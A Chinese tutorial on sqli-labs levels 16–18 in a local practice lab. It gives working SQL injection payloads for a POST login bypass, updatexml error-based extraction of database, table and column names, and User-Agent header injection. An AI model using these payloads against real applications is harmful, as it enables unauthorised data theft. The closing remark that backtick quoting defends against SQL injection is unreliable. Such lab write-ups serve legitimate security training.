SQL注入进阶教学：sqli-labs关卡16-18详解<\/h1>

环境准备<\/h2>
操作系统：Windows 7<\/li>
部署工具：phpstudy2018<\/li>
靶场环境：sqli-labs<\/li> <\/ul>
第16关：POST请求注入与闭合方式<\/h2>

注入点确定<\/h3>
通过不断尝试确定注入点为 1")<\/code> 闭合<\/li>
测试方法：使用单引号、双引号和小括号配合布尔盲注<\/li>
<\/ul>
关键发现<\/h3>


提交方式差异<\/strong>：<\/p>

在Hacker Bar工具中直接提交可能无法正确处理特殊字符(如+<\/code>, #<\/code>)<\/li>
通过页面表单提交会自动进行URL编码<\/li>
建议优先使用页面表单进行测试<\/li>
<\/ul>
<\/li>

POST请求格式<\/strong>：<\/p>

Content-Type: application\/x-www-form-urlencoded<\/code><\/li>
特点：

数据以键值对形式组织(key=value<\/code>)<\/li>
不同键值对用&<\/code>分隔<\/li>
特殊字符会被URL编码(如空格→+<\/code>或%20<\/code>，#<\/code>→%23<\/code>)<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

有效Payload<\/strong>：<\/p>
uname=<\/span>1<\/span>") or 1=1 #&passwd=1&submit=Submit
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
第17关：密码字段报错注入<\/h2>
注入特点<\/h3>

用户名输入无效，正确用户名会返回"SUCCESSFULLY UPDATED YOUR PASSWORD"<\/li>
注入点在密码字段<\/li>
<\/ul>
报错注入利用<\/h3>


测试单引号触发报错：<\/p>
1<\/span>'
<\/span><\/span><\/span><\/code><\/pre><\/li>

使用updatexml进行报错注入：<\/p>
uname=<\/span>admin<\/span>&<\/span>passwd=<\/span>1<\/span>' and updatexml(1,concat(0x7e,database(),0x7e),1)#  \/\/获取库名
<\/span><\/span><\/span>
<\/span><\/span><\/span>uname=admin&passwd=1'<\/span> and<\/span> updatexml(1<\/span>,concat(0<\/span>x7e,(select<\/span> group_concat(table_name<\/span>) from<\/span> information_schema.tables where<\/span> table_schema=<\/span>'security'<\/span>),0<\/span>x7e),1<\/span>)#<\/span>  \/\/<\/span>获取表名<\/span>
<\/span><\/span>
<\/span><\/span>uname=<\/span>admin<\/span>&<\/span>passwd=<\/span>1<\/span>' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='<\/span>security<\/span>' and table_name='<\/span>users'),0x7e),1)#  \/\/获取字段
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
第18关：User-Agent头部注入<\/h2>
注入背景<\/h3>

PHP语句：
$insert=<\/span>"INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('<\/span>$uagent<\/span>', '<\/span>$IP<\/span>', <\/span>$uname<\/span>)"<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
$uagent<\/code>来自$_SERVER<\/code>获取的User-Agent字段<\/li>
<\/ul>
关键知识点<\/h3>


反引号作用<\/strong>：<\/p>

MySQL特性，用于区分关键字和标识符<\/li>
例如order<\/code>是关键字，但`order`<\/code>会被识别为表名<\/li>
<\/ul>
<\/li>

注入步骤<\/strong>：<\/p>

使用BurpSuite抓包<\/li>
修改User-Agent字段进行测试<\/li>
单引号测试触发报错，双引号闭合成功<\/li>
<\/ul>
<\/li>

常见错误<\/strong>：<\/p>

直接设置User-Agent为updatexml(...)<\/code>无效<\/li>
原因：会被当作字符串而非函数执行<\/li>
<\/ul>
<\/li>

正确Payload<\/strong>：<\/p>
' and updatexml(1,concat(0x7e,database(),0x7e),1) and '<\/span>1<\/span>'='<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>
需要手动闭合前后的单引号<\/li>
<\/ul>
<\/li>
<\/ol>
工具使用技巧<\/h2>


BurpSuite<\/strong>：<\/p>

抓取合法请求包<\/li>
发送到Repeater模块修改测试<\/li>
观察报错信息判断闭合方式<\/li>
<\/ul>
<\/li>

Hacker Bar<\/strong>：<\/p>

注意表单提交与工具直接提交的区别<\/li>
特殊字符处理方式不同<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施理解<\/h2>

反引号的使用是防御SQL注入的一种方式<\/li>
但参数未过滤仍会导致注入风险<\/li>
完整防御应结合预处理语句和参数化查询<\/li>
<\/ul>
总结<\/h2>
这三关展示了不同场景下的SQL注入技术：<\/p>

POST表单注入及闭合方式<\/li>
密码字段的报错注入<\/li>
HTTP头部的User-Agent注入<\/li>
<\/ol>
关键点在于理解不同场景下的闭合方式，以及如何构造有效的Payload绕过限制获取数据。<\/p>